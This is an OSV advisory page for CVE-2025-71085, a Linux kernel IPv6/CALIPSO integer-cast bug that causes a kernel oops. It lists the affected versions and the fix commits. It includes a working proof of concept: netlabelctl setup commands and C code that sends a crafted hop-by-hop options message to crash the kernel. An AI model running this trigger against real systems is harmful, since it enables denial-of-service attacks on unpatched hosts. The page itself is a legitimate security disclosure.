CVE-2025-71085

See a problem?
Please try reporting it to the source first.
Source
https://cve.org/CVERecord?id=CVE-2025-71085
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2025-71085
Downstream
Related
Published
2026-01-13T15:34:48.324Z
Modified
2026-03-16T08:44:07.608350Z
Summary
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
Details

In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskbexpandhead() as part of calipsoskbuffsetattr()

There exists a kernel oops caused by a BUGON(nhead < 0) at net/core/skbuff.c:2232 in pskbexpandhead(). This bug is triggered as part of the calipsoskbuffsetattr() routine when skbcow() is passed headroom > INTMAX (i.e. (int)(skbheadroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in _skbcow(). The check (headroom > skbheadroom(skb)) is meant to ensure that delta = headroom - skbheadroom(skb) is never negative, otherwise we will trigger a BUGON in pskbexpandhead(). However, if headroom > INTMAX and delta <= -NETSKBPAD, the check passes, delta becomes negative, and pskbexpandhead() is passed a negative value for nhead.

Fix the trigger condition in calipsoskbuffsetattr(). Avoid passing "negative" headroom sizes to skbcow() within calipsoskbuffsetattr() by only using skbcow() to grow headroom.

PoC: Using netlabelctl tool:

    netlabelctl map del default
    netlabelctl calipso add pass doi:7
    netlabelctl map add default address:0::1/128 protocol:calipso,7

    Then run the following PoC:

    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

    // setup msghdr
    int cmsg_size = 2;
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,
                    sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

    sendmsg(fd, &msg, 0);
Database specific 
{
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2025/71xxx/CVE-2025-71085.json",
    "cna_assigner": "Linux"
}
References

Affected packages

Git / git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git

Affected ranges

Type
GIT
Repo
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git
Events
Introduced
2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3
Fixed
86f365897068d09418488165a68b23cb5baa37f2
Fixed
6b7522424529556c9cbc15e15e7bd4eeae310910
Fixed
2bb759062efa188ea5d07242a43e5aa5464bbae1
Fixed
c53aa6a5086f03f19564096ee084a202a8c738c0
Fixed
bf3709738d8a8cc6fa275773170c5c29511a0b24
Fixed
73744ad5696dce0e0f43872aba8de6a83d6ad570
Fixed
58fc7342b529803d3c221101102fe913df7adb83

Database specific

source 
"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json"

Linux / Kernel

Package

Name
Kernel

Affected ranges

Type
ECOSYSTEM
Events
Introduced
4.8.0
Fixed
5.10.248
Type
ECOSYSTEM
Events
Introduced
5.11.0
Fixed
5.15.198
Type
ECOSYSTEM
Events
Introduced
5.16.0
Fixed
6.1.160
Type
ECOSYSTEM
Events
Introduced
6.2.0
Fixed
6.6.120
Type
ECOSYSTEM
Events
Introduced
6.7.0
Fixed
6.12.64
Type
ECOSYSTEM
Events
Introduced
6.13.0
Fixed
6.18.4

Database specific

source 
"https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2025-71085.json"